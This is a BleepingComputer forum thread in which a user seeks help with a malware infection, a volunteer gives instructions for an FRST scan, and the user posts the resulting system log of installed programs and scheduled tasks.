Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Bitsadmin.exe & downloading random stuff through CMD.


  • This topic is locked This topic is locked
14 replies to this topic

#1 Pepsiman22

Pepsiman22

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 15 January 2018 - 12:07 AM

Heya. Call me Gio. So, i've made a wrong turn and ended up downloading this russian installer. Seems like i missclicked something and ended up getting myself in a sticky situation:
First, i got this new browser (copypasted from chrome, wasnt chromium, it was something along the lines of "Go!". Cant remember.
Secondly, a few suspicious browser extensions appeared and the default search motor was changed, no biggie, usually happens. Turns out that even if i changed my motor to Google, the search motor wouldnt change. Had to restart chrome by default and uninstall the bad browser. Everything relatively easy at this point.
Thirdly, CMD popped up started downloading some stuff (Couldnt get the names, it was pretty fast, it was something along the lines of "Ccyx-stuff stuff"). Then i popped up Avira and Malwarebytes. Did some scanning and CMD popped up again,
Fourthly. Got this CMD:  https://imgur.com/i2cblKy
Basically says that a task called "oiemMex" was created, and the bitsadmin. Then i checked the task scheduler and turns out, it was there and it was supposed to open a program called "XASormJT" on Program Files. Deleted the file and tried deleting the task, but it didnt work, so now im here.
Edit: While desperatedly checking the scheduler, i found other two that are supposed to start every three hours: EOrUYoez.bat and IwPFYU.exe.
Deleted them both too.


Edited by Pepsiman22, 15 January 2018 - 12:23 AM.


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 15 January 2018 - 08:20 AM

Hi Pepsiman22 :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Download the right version of FRST for your system:
    • FRST 32-bit
    • FRST 64-bit
      Note: Only the right version will run on your system, the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using.
  • Move the executable (FRST.exe or FRST64.exe) on your Desktop
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds
  • Make sure the Addition.txt box is checked
  • Click on the Scan button
    KSJwAxg.png
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 15 January 2018 - 06:20 PM

Hey what's up Aura! Nice to meet you, you seem like a chill person. Just for the record, how do you make a "Spoiler" button? i just want to keep it all as clean as possible. Also, i want to thank you beforehand for helping me and reading all of this.
Here are the logs, friendo:
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.01.2018
Ran by Franco (15-01-2018 20:05:15)
Running from C:\Users\Franco\Downloads
Windows 7 Professional Service Pack 1 (X64) (2017-05-23 19:52:53)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrador (S-1-5-21-2176517476-3644118065-910164434-500 - Administrator - Disabled)
Franco (S-1-5-21-2176517476-3644118065-910164434-1000 - Administrator - Enabled) => C:\Users\Franco
Invitado (S-1-5-21-2176517476-3644118065-910164434-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ACP Application (HKLM\...\{CC5B3AA9-1152-E9B3-7DCF-0F2B313DFFB3}) (Version: 2017.1102.1434.20 - Advanced Micro Devices, Inc.) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 28.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.170 - Adobe Systems Incorporated)
Adobe Flash Player 28 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated)
Adobe Premiere Pro CS6 (HKLM-x32\...\{7176B973-6011-43C1-AEBC-2D73FE7C6982}) (Version: 6.0 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
APP Shop v1.0.31 (HKLM-x32\...\{90242E9B-BC60-46E3-8EE7-8E953F702280}_is1) (Version: 1.0.31 - ASRock Inc.)
ASRock App Charger v1.0.6 (HKLM\...\ASRock App Charger_is1) (Version: 1.0.6 - ASRock Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
CCleaner (HKLM\...\CCleaner) (Version: 5.37 - Piriform)
Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version:  - Cheat Engine)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.1.0232 - Disc Soft Ltd)
Defraggler (HKLM\...\Defraggler) (Version: 2.21 - Piriform)
Discord (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
Epic Games Launcher (HKLM-x32\...\{4842BC16-D55B-4DB2-8F0D-72F5EA320D92}) (Version: 1.1.133.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Hard Disk Sentinel PRO (HKLM-x32\...\Hard Disk Sentinel_is1) (Version: 5.01 - Janos Mathe)
Java 8 Update 151 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\{11B6CA74-0359-4E8B-9729-1902B9ADD29C}) (Version: 4.1.2 - Riot Games) Hidden
League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games)
Malwarebytes versión 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Microsoft .NET Framework 4.6.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01590 - Microsoft Corporation)
Microsoft .NET Framework 4.6.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01590 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.14.162.1217 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 19.0.3 - OBS Project)
Paquete de controladores de Windows - Realtek (RTL8167) Net  (12/23/2016 7.104.1223.2016) (HKLM\...\8FE7583BA3BE7DC67C5AE21C06F30A7E65FB3C21) (Version: 12/23/2016 7.104.1223.2016 - Realtek)
PBE (HKLM-x32\...\PBE 1.0) (Version: 1.0 - Riot Games, Inc)
PokeMMO (HKLM\...\PokeMMO_is1) (Version:  - PokeMMO)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8105 - Realtek Semiconductor Corp.)
SafeZone Stable 3.55.2393.607 (HKLM-x32\...\SafeZone 3.55.2393.607) (Version: 3.55.2393.607 - Avast Software) Hidden
SafeZone Stable 4.58.2552.909 (HKLM-x32\...\SafeZone 4.58.2552.909) (Version: 4.58.2552.909 - Avast Software) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\TeamSpeak 3 Client) (Version: 3.1.6 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.78716 - TeamViewer)
The Sims 4 (HKLM-x32\...\The Sims 4_is1) (Version:  - )
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-11-02] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-07] (AVAST Software)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0F1EFFAE-A569-4A3A-A19B-97089D6E1F79} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
Task: {1A9C244C-8D4E-4972-ACDB-1CF6368E38CF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-14] (Adobe Systems Incorporated)
Task: {2DB0BC69-3694-4F14-9B65-18DA99A90F63} - System32\Tasks\SafeZone scheduled Autoupdate 1495573797 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-08-04] (Avast Software)
Task: {3192ACC3-D0C4-4F5E-AEF8-0306FD536929} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {3314EAC1-A834-477A-A2BD-5882057E1A29} - System32\Tasks\AdobeAAMUpdater-1.0-Porota-Franco => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {3D126450-53B3-4AF4-B414-123A9EA3F68E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2018-01-08] (AVAST Software)
Task: {4C12F257-5402-4E88-A485-D81BE17037DB} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe
Task: {4DB06FFB-23AA-427E-90E0-7BD6E0730732} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-23] (Google Inc.)
Task: {4E728FA0-BF71-49ED-9C7F-01337D2959DF} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_170_pepper.exe [2017-10-18] (Adobe Systems Incorporated)
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\Adobe Flash Player PPAPI Notifier" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\AdobeAAMUpdater-1.0-Porota-Franco" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\CCleaner Update" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(4): schtasks.exe -> /Change /TN "\CCleanerSkipUAC" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(5): schtasks.exe -> /Change /TN "\DriverDoc Auto Start" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\dzopercomjhar" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(7): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineCore" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(8): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineUA" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(9): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_ipoint_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(10): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_itype_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(11): schtasks.exe -> /Change /TN "\Microsoft_Hardware_Launch_mousekeyboardcenter_exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(12): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_ceip.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(13): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_ipoint.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(14): schtasks.exe -> /Change /TN "\Microsoft_MKC_Logon_Task_itype.exe" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe -> /Change /TN "\mtxoaIdylJOZ" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe -> /Change /TN "\oieMmex" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe -> /Change /TN "\pSER" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(18): schtasks.exe -> /Change /TN "\SafeZone scheduled Autoupdate 1495573797" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(19): schtasks.exe -> /Change /TN "\StartCN" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(20): schtasks.exe -> /Change /TN "\{41144399-A0E8-4F67-B667-8A207B530D7C}" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(21): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {5D79BA49-76DB-48D6-9D91-99819EFC9CEA} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2017-11-08] (Piriform Ltd)
Task: {63335D8B-5991-4819-A7D7-AC1C118D5C54} - System32\Tasks\DriverDoc Auto Start => D:\Solvusoft\DriverDoc\DriverDoc.exe
Task: {8D40ADE7-608A-4DB9-B440-2F9BB0BE8220} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-11-08] (Piriform Ltd)
Task: {ADD2F042-4814-44F2-8959-3C7E88ADA4EF} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-01-07] (AVAST Software)
Task: {BF825648-2593-4AD0-847E-8B6C6B149192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-23] (Google Inc.)
Task: {D0A562C7-198A-4648-BB81-8C4FE25D7CE1} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-11-02] (Advanced Micro Devices, Inc.)
Task: {D1E5BB4A-1E14-4C24-9AD1-9DC771B75CE5} - System32\Tasks\HardDiskSentinel\Hard Disk Sentinel_Franco => D:\Hard Disk Sentinel\HDSentinel.exe [2017-03-09] (H.D.S. Hungary)
Task: {DCB73935-10AA-4788-AD5E-15667CBCBA14} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\DriverDoc Auto Start.job => D:\Solvusoft\DriverDoc\DriverDoc.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2018-01-07 23:22 - 2018-01-07 23:22 - 000067920 _____ () c:\Program Files\AVAST Software\Avast\x64\module_lifetime.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000067984 _____ () C:\Program Files\AVAST Software\Avast\x64\dll_loader.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000236840 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000902824 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000349568 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll
2017-07-25 12:25 - 2017-07-25 12:25 - 000015360 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2017-07-25 12:25 - 2017-07-25 12:25 - 002519040 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-01-09 02:46 - 2018-01-03 06:20 - 004063064 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libglesv2.dll
2018-01-09 02:46 - 2018-01-03 06:20 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libegl.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000058016 _____ () C:\Program Files\AVAST Software\Avast\module_lifetime.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000057504 _____ () C:\Program Files\AVAST Software\Avast\dll_loader.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000206152 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000289272 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000196248 _____ () C:\Program Files\AVAST Software\Avast\network_notifications.dll
2018-01-15 05:49 - 2018-01-15 05:49 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011500\algo.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000745408 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000148936 _____ () C:\Program Files\AVAST Software\Avast\hns_tools.dll
2018-01-15 19:54 - 2018-01-15 19:54 - 005768336 _____ () C:\Program Files\AVAST Software\Avast\defs\18011504\algo.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000293944 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-07-23 19:38 - 2017-07-23 19:38 - 067109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2018-01-07 23:22 - 2018-01-07 23:22 - 000282560 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
